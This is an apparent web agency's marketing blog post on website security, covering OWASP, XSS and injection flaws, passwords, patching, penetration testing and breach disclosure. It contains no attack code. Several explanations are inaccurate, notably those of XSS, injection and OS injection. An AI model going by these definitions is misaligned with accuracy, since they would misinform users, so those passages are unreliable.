What You Need to Know About Website Security
What’s the impact?
Most recent news articles are focusing on physicians and the use of Electronic Health Records (EHRs). Lost laptops and insecure software have caused devastating effects. Patients are left vulnerable to attacks based on their personal information and health status. In response to security concerns, new guidance has been issued around HIPPA to step up web security regulations. Healthcare programs are required to have a full security plan in place. This includes consistent monitoring of their security plan for threats.
How can I stay safe?
In 2001 the Open Web Application Security Project (OWASP) was founded. This is a non-profit agency comprised of corporations, small businesses, and individual contributors. They are focused on the improvement of Internet web security. In 2003, OWASP released a list of their top 10 most prevalent security concerns in application development. It includes programming standards that can be used to overcome these concerns. The most recent 2013 version can be found here.
According to OWASP, security can be achieved with the following 3 steps:
1. Identify risk and assess likelihood and impact to your business
2. Follow programming best practices to minimize or eliminate vulnerabilities
3. Constantly scan and monitor the framework to ensure that it remains secure
What are the dangers?
Security protocols. Security configurations, session authentications, and access controls can be implemented incorrectly. These are the processes that a website uses to make sure that a user is who they say they are. Oversights can allow attackers to obtain passwords, keys, and session tokens. The more criteria you have for password development the better.
Data validation. An XSS flaw (cross-site scripting) occurs when an application does not properly validate data that it is sending to a web browser. For example, when you enter your username and password into any secured site, the site then accesses a database to verify the information. The site then comes back to confirm that the information has been validated. During those two trips your session can be hijacked or any requests can be redirected to malicious sources.
Flawed code. Ensure that coded commands requesting an exchange of information between websites and external sources are secure. Some examples include SQL (Structured Query Language) commands which call on data sources to function; OS (Operating System) injections that call on the user’s operating system; or LDAP protocols (like single-sign on passwords). Insecure commands leave room for injections. An injection occurs when an attacker intercepts your command to insert their own malicious code.
An advanced website like a meeting registration website may rely on many of these potentially vulnerable functions to operate. SQL commands are used to update and make changes to attendee lists and program schedules. OS injections can occur when the platform accesses the user’s calender or email for scheduling. Websites like this need to have a foolproof system in place for security.
Web security encompasses every component of a web experience. Servers, networks, hardware and software all need to be locked down. Cloud computing and “Bring Your Own Device” have complicated the issue. You now need to be monitoring your users’ systems as well as your own. The checklist can go on and on. The best place to start is with the framework of your website. Here are a few things to keep in mind.
Weak passwords include ones that are comprised of all numbers or all text. Passwords that are re-used across multiple programs or websites can also weaken security, as can storing passwords on an easily accessible program. A strong password is at least eight characters long. It shouldn’t contain the user’s username or company name. Avoid complete words and make new passwords significantly different from previous. Force password updates often and with strict guidelines. Personal security questions can help accomplish these security goals.
Software Updates and Patches
Developers don’t stop programming once a solution is installed for their client. Mobile technology makes this even more critical as one program tends to rely on many others to operate. So if one program pushes an update, they all need to. As soon as any updates become available, your developer should be revising the program and installing a patch. Otherwise, that simple software update can become vulnerability…fast.
Scanning and Testing
Penetration testing and vulnerability scanning will keep you abreast of your website’s security. Penetration testing includes scanning your code and simulating real-world attacks to identify vulnerabilities. Vulnerability scanning constantly monitors firewalls and websites to ensure that they are maintaining their strength and security. In both cases, you are notified immediately when a vulnerability is detected.
What to do Once You’ve Identified a Vulnerability
If you have detected a vulnerability, the first thing you should do – of course – is remove it. The next thing you want to determine is if the vulnerability was actually breached and what data was taken. From there, it depends on the level of the breach. If any personal information has been accessed, the best thing to do is to disclose it immediately. Target customers were infuriated to learn that Target knew about their security breach for a full month before disclosing it. Over 70 million customers had their credit information, phone numbers, home and e-mail addresses stolen. Where personal information is involved the more immediate the response, the better.
It is imperative to choose a web partner who has security at the top of their minds. Security is a complex but vital aspect of web development. Vulnerabilities can develop anywhere…anytime. Flawed code is more common than you think. The Apple breach that was recently uncovered is there because a developer accidentally duplicated a line of code. That one line of code left encrypted connections where private information was transferred open for attack. Web partners should have QA processes in place, to scan their code and security checkpoints for their own internal systems. They should be swift and adept at detecting and fixing vulnerabilities to decrease the likelihood of an attack.
If you’d like to learn more about website security, please feel free to reach out to Creative MediaWorks at info@CreativeMediaWorks.com and ask to speak to our Multimedia Manager today.
Thank you for visiting our blog. We hope the information provided was useful to you. If you haven’t joined our newsletter list, sign up here.